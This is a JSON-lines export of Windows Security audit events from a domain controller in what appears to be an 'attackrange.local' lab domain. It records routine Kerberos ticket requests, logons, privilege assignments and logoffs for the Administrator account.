{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220566,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220567,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{B0223783-4A4F-16BB-7F4A-4A44C6266D53}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{B0223783-4A4F-16BB-7F4A-4A44C6266D53}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220568,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{B0223783-4A4F-16BB-7F4A-4A44C6266D53}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{B0223783-4A4F-16BB-7F4A-4A44C6266D53}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220569,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7F42A\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{B0223783-4A4F-16BB-7F4A-4A44C6266D53}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x7f42a","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{B0223783-4A4F-16BB-7F4A-4A44C6266D53}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220570,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7F42A\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x7f42a","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220571,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7F42A\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x7f42a","LogonType":"3","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220572,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220573,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{B0223783-4A4F-16BB-7F4A-4A44C6266D53}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{B0223783-4A4F-16BB-7F4A-4A44C6266D53}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220574,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{B0223783-4A4F-16BB-7F4A-4A44C6266D53}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{B0223783-4A4F-16BB-7F4A-4A44C6266D53}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220575,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7F44C\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{B0223783-4A4F-16BB-7F4A-4A44C6266D53}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x7f44c","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{B0223783-4A4F-16BB-7F4A-4A44C6266D53}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220576,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7F44C\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x7f44c","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220577,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7A3F8\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x7a3f8","LogonType":"3","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220578,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7A117\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x7a117","LogonType":"3","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220579,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7F44C\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x7f44c","LogonType":"3","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
